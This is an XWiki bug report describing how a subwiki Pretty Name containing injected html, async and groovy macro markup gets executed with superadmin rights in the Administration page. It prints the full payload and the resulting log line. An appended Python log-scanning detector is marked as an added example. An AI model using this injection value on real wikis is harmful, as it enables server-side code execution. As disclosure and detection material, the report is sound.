XWiki Platform / XWIKI-21109

Wiki Pretty name content is executed in the Administration of a subwiki he created


Details

    • Type: Bug
    • Resolution: Duplicate
    • Priority: Blocker
    • None
    • 9.2-rc-1
    • Component/s: Administration
    • Environment: Windows 11 Pro, Edge 114, using a local instance of XWiki 15.5, Jetty/HSQLDB

Description

Steps to reproduce

1. Log in as a user (e.g. U1)
2. Create a subwiki with the Pretty Name:
   ]]{{/html}}{{async}}{{groovy}}services.logging.getLogger("attacker").error("Attack succeeded!"){{/groovy}}{{/async}}
3. Go to the subwiki
4. Navigate to Drawer > Administer Wiki

Expected results

The code is not executed and no error is displayed in the server-side logs.

Actual results

The content is executed and the following error is displayed in the logs:

2023-07-05 14:59:35,483 [org.xwiki.rendering.async.internal.AsyncRendererJob@f0b7c79([async, macro, htmlasyncgroovyservicesloggin1:XWiki.AdminSheet, 24, author, xwiki:XWiki.superadmin, rendering.restricted, false, secureDocument, htmlasyncgroovyservicesloggin1:XWiki.AdminSheet, 165])] ERROR attacker                       - Attack succeeded!
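As an added example (not part of this issue or of XWiki's own code), a small Python detection that scans XWiki log lines for the pattern the log line above shows: an async rendering job executing a script macro with unrestricted rendering, attributed to a privileged author. The log line shape and the job-id field positions are assumed from the single line quoted above; the benign sample lines are constructed.

```python
import re
from dataclasses import dataclass

# Shape of the AsyncRendererJob log line quoted in this issue
# (assumption: the bracketed job-id list and the "LEVEL logger - message" tail are stable).
JOB_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \[org\.xwiki\.rendering\.async\.internal\.AsyncRendererJob@\w+"
    r"\(\[(?P<jobid>[^\]]*)\]\)\]\s+(?P<level>\w+)\s+(?P<logger>\S+)\s+- (?P<msg>.*)$"
)

# Script macro names looked for in the content-derived id (assumption: heuristic, not an XWiki guarantee).
SCRIPT_MACROS = ("groovy", "python", "velocity")

# Constructed sample log: entry 1 is the line from the issue, entries 2 and 3 are benign and made up.
SAMPLE_LOG = [
    "2023-07-05 14:59:35,483 [org.xwiki.rendering.async.internal.AsyncRendererJob@f0b7c79([async, macro, "
    "htmlasyncgroovyservicesloggin1:XWiki.AdminSheet, 24, author, xwiki:XWiki.superadmin, rendering.restricted, "
    "false, secureDocument, htmlasyncgroovyservicesloggin1:XWiki.AdminSheet, 165])] ERROR attacker"
    "                       - Attack succeeded!",
    "2023-07-05 15:01:02,001 [org.xwiki.rendering.async.internal.AsyncRendererJob@1a2b3c4([async, macro, "
    "html1:Main.WebHome, 3, author, xwiki:XWiki.Alice, rendering.restricted, true, secureDocument, "
    "Main.WebHome, 9])] INFO  renderer - cached",
    "2023-07-05 15:01:03,000 [main] INFO  org.xwiki.Startup - unrelated line",
]

@dataclass
class Alert:
    timestamp: str
    author: str
    document: str
    content_id: str

def parse_job_id(jobid: str) -> dict:
    """Split the job-id list: 'author', 'rendering.restricted' and 'secureDocument'
    are each followed by their value, and element 2 is the content-derived id."""
    parts = [p.strip() for p in jobid.split(",")]
    fields = {"content_id": parts[2] if len(parts) > 2 else ""}
    for key in ("author", "rendering.restricted", "secureDocument"):
        if key in parts and parts.index(key) + 1 < len(parts):
            fields[key] = parts[parts.index(key) + 1]
    return fields

def find_script_macro_alerts(lines):
    """Return one Alert per async render of a script macro done with unrestricted rendering."""
    alerts = []
    for line in lines:
        m = JOB_RE.match(line)
        if not m:
            continue  # not an AsyncRendererJob line
        f = parse_job_id(m.group("jobid"))
        if f.get("rendering.restricted") == "false" and any(s in f["content_id"] for s in SCRIPT_MACROS):
            alerts.append(Alert(m.group("ts"), f.get("author", ""), f.get("secureDocument", ""), f["content_id"]))
    return alerts
```

Running it over SAMPLE_LOG yields a single alert, for the superadmin-attributed groovy render in XWiki.AdminSheet.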

People

MichaelHamann Michael Hamann
iandriuta Ilie Andriuta